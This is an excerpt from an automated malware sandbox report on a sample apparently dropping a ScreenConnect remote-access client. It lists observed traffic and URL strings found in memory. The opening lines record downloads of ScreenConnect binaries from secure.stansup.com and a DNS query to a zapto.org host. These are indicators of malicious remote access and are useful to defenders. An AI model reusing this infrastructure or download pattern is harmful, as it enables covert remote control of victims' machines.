                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: secure.stansup.com
                  Source: global trafficDNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000003.1433983414.000001E11B959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606505484.000001E11BE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449639366.000001E11B077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605566534.000001E11B07A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: dfsvc.exe, 00000001.00000002.2242504544.0000021CEC6EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.c
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000007.00000002.2607269224.000002074AC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2240874831.0000021CEA99E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000001.00000002.2240921151.0000021CEA9A5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000008.00000002.2606460668.000001E11BE13000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2238360883.0000021CE8AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f65b439
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
                  Source: svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                  Source: svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606146070.000001E11B902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449163032.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
                  Source: svchost.exe, 00000008.00000003.1417148795.000001E11B952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlepk
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsx
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Mic
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
                  Source: dfsvc.exe, 00000001.00000002.2239079967.0000021CE8ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c
                  Source: Qjq85KfhBC.exe, 00000000.00000002.1445501228.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                  Source: dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000001.00000002.2239737047.0000021CEA8E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2238360883.0000021CE8AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crll
                  Source: svchost.exe, 00000008.00000003.1455371851.000001E11BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B0F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000003.1449293708.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1433346941.000001E11B92B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policysrf
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scken
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1416236491.000001E11B955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000003.1433983414.000001E11B959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1449639366.000001E11B077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1417812360.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605566534.000001E11B07A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000002.2606537340.000001E11BE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2606300505.000001E11B96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD023A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1810637519.0000000001CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0924000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: Qjq85KfhBC.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD081A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD083D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD08A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752587348.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601Auth
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601roofManage
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603rf
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604fg:Complet
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605teAccountC
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384073807.000001E11B957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 00000007.00000003.1377739911.000002074AE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B0F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B0F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
